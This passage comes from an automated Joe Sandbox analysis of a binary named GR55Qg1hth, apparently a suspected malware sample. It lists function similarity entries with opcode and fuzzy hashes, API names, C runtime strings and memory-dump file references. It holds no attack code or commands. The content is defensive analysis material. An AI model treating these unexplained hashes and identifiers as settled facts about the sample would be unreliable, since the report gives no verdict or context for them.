                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 8169614b691d3850c5d9c0ef4f2340dbed68275c4bac6d5131f657ee4ddeeca6
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: D011A333A10A1331FA641528E441BE931C17B7CBF4F4C862CED6E162F6CB2EC84D420A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeavecalloc
                                                                    • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                                                                    • API String ID: 876395260-4180103562
                                                                    • Opcode ID: 6b1b94e2b854d058ceb5e352e6701c080ee4a6c78f0fd052f1b8341398326f66
                                                                    • Instruction ID: 8831502b3096334eeae26042fae90bb705781c85bfe8786846dbbaf4ec535b95
                                                                    • Opcode Fuzzy Hash: 6b1b94e2b854d058ceb5e352e6701c080ee4a6c78f0fd052f1b8341398326f66
                                                                    • Instruction Fuzzy Hash: 03011771A19603F5FB619B55FA411B527A0AF48B90FCC4534D91CE7B94EE2CE987C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 2750122171-0
                                                                    • Opcode ID: 6b3bebf15781c7906bfe3100282d93060f2eddcdd3cbff8ec681021e1514230b
                                                                    • Instruction ID: ebe9a454731a03732c52b503c62d5b73b429e76d79a694174e7db786ddaca48c
                                                                    • Opcode Fuzzy Hash: 6b3bebf15781c7906bfe3100282d93060f2eddcdd3cbff8ec681021e1514230b
                                                                    • Instruction Fuzzy Hash: 5BF05E31A2DA03E7FBA89F71949017916E0AF4DB15F4C1D34CA1EE53E0DE2CE4898790
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: 23167f491d3e9b6665773531ad765ea0a123cb5806978eea1eaba597c0e3d5e9
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 5A61CE7260024882FA69DB69E554FEA3AE1F7AE780F50452DCE0E177B5DB3EC84D8700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 3964148931290ba476289fe162760b5e4427535d89a4daa7973509179e3efcbb
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 52516E32204288CAEB648F259544B9977E0F369B94F18431EDE9D87BA5CB3FD499CF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: 8c3da9e0587f978680cc4aa915e92a87e4c10184d4090a04f9f94ac6ac7b0b09
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 6A51B2327016048BEB14CB15E444F9937E5F368BA8F58822DDE1F437A8EB7ACC4A8704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: a8cbe21f0373ac90909c95a5607b7a928d8ce80ff420be00e84f2387ac46b2cb
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: C7318A3220164497E714DB11E844BA977E4F368B98F09821CEE5F037A8DB3EC94AC704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID: T%p %d %s$T%p %d V=%0X H=%p %s
                                                                    • API String ID: 2882836952-2059990036
                                                                    • Opcode ID: 67f0619711882fb8c0885a03d3f557804ff1321dd50c7e9c0f78b0fdb08f2ed4
                                                                    • Instruction ID: c3d754201341912b95fec946e418ee7f9ca4dd0a73beaa6e43cb050164258f86
                                                                    • Opcode Fuzzy Hash: 67f0619711882fb8c0885a03d3f557804ff1321dd50c7e9c0f78b0fdb08f2ed4
                                                                    • Instruction Fuzzy Hash: 02014033B08607A6E6219B16E9014BA67A5BF8CB94F4C4135EE4CE7755DE3CE446CB40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: freememcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 2208669145-0
                                                                    • Opcode ID: b366c3624a34b6328c43b6877c5c82287045cc84d1d7adc9d48f6e0e4c069e09
                                                                    • Instruction ID: b819a488ef1841cd27e1554c7415ed2aa66d67e1244cf355f71ddde29c243c7b
                                                                    • Opcode Fuzzy Hash: b366c3624a34b6328c43b6877c5c82287045cc84d1d7adc9d48f6e0e4c069e09
                                                                    • Instruction Fuzzy Hash: 0131D472A2864360FF615E529B1037B6A90BF447A8F0C4131DE4EBA3C4DFBCE6469600
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
                                                                    • Instruction ID: 8b31640040d8e6dba615892e93c284bdaf722bb75b247597b9d249c81ed7d343
                                                                    • Opcode Fuzzy Hash: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
                                                                    • Instruction Fuzzy Hash: 02C1E773E18A4366E7204A29A2013BA2EA1BF48B68F1C4235DE5DA77C5CE3CFD518741
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
                                                                    • Instruction ID: 6af446f3f792fb4051bad825e962cc1fa102be30e8f5fc1e4be247424c76cb54
                                                                    • Opcode Fuzzy Hash: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
                                                                    • Instruction Fuzzy Hash: 19C1D677E1824366EB214A2986453BE6EA1BF18B68F1D4235CA1DB77C5CE3DF842C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: _GLOBAL_
                                                                    • API String ID: 39653677-770460502
                                                                    • Opcode ID: 3700fe73c6d3e605f7d873da3646bfec28a4c554f7b500fea2f5946d5c8f7650
                                                                    • Instruction ID: 9c7cade9f74266f90ee2525afa7d8adf653b7d5b6795c4469a7f4700f16e92d0
                                                                    • Opcode Fuzzy Hash: 3700fe73c6d3e605f7d873da3646bfec28a4c554f7b500fea2f5946d5c8f7650
                                                                    • Instruction Fuzzy Hash: EED1E372A18AD7A9F7608BA19D043FE3FA1AB05798F484035DA8DAB789CF3CD545C740
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
                                                                    • Instruction ID: 67fd2549feff1fe2e8d3ebb2ae1df8e25bd12e399b6b13e4bc7e76a14f0df355
                                                                    • Opcode Fuzzy Hash: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
                                                                    • Instruction Fuzzy Hash: D891A572E19A5366E7658F29A2043B96EA1BB08B94F5C8131CE0DA73C4DF3CF842C740
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
                                                                    • Instruction ID: 269b16ff16736dd403ff4dfe4ae70a21cebdefc6da107e57a0be8f54aaeac687
                                                                    • Opcode Fuzzy Hash: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
                                                                    • Instruction Fuzzy Hash: 48918472F0925796E7658F2982007B96EA1BB18B98F5C9632CE0DA77C5DF3CE841C740
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: basic_string::_M_construct null not valid
                                                                    • API String ID: 0-3522614731
                                                                    • Opcode ID: a5833ebf22b63d39d6e73767eddfec624db1c2a534896e8e1132fb8364345cb2
                                                                    • Instruction ID: 475c0a116d1797b76d558cd3fca5ef2417a644e4aeed6a43e2ed80f7ecfdae4b
                                                                    • Opcode Fuzzy Hash: a5833ebf22b63d39d6e73767eddfec624db1c2a534896e8e1132fb8364345cb2
                                                                    • Instruction Fuzzy Hash: C851E572A08B62A0EB21AB15E500179BBA0EB09BD4F5C4531DEDDAB795DE3CD942C700
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                                                                    • API String ID: 0-1533248280
                                                                    • Opcode ID: 69b0789b314b52825bb77d66b6d180235828afc0662c9bd68efef1e0263b7fea
                                                                    • Instruction ID: 73d244c74fb1a5bd85b9bdbcabbe5d68f717bbcbcddd5f7dcd4c2b53cd6ab465
                                                                    • Opcode Fuzzy Hash: 69b0789b314b52825bb77d66b6d180235828afc0662c9bd68efef1e0263b7fea
                                                                    • Instruction Fuzzy Hash: 754113B2F16647B1EF11AB62E5183BD6790AB64BC4F4C8031DE4C6B786EE2CD585C380
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                                                                    • API String ID: 0-1533248280
                                                                    • Opcode ID: e28340071463f334725f87ad43f4c211ae9b0b6aa16a424defd9399211e07755
                                                                    • Instruction ID: 118e6b301dc337bed4594f2b9afbbad44ef7e15b86a29290e6455d8012b9e238
                                                                    • Opcode Fuzzy Hash: e28340071463f334725f87ad43f4c211ae9b0b6aa16a424defd9399211e07755
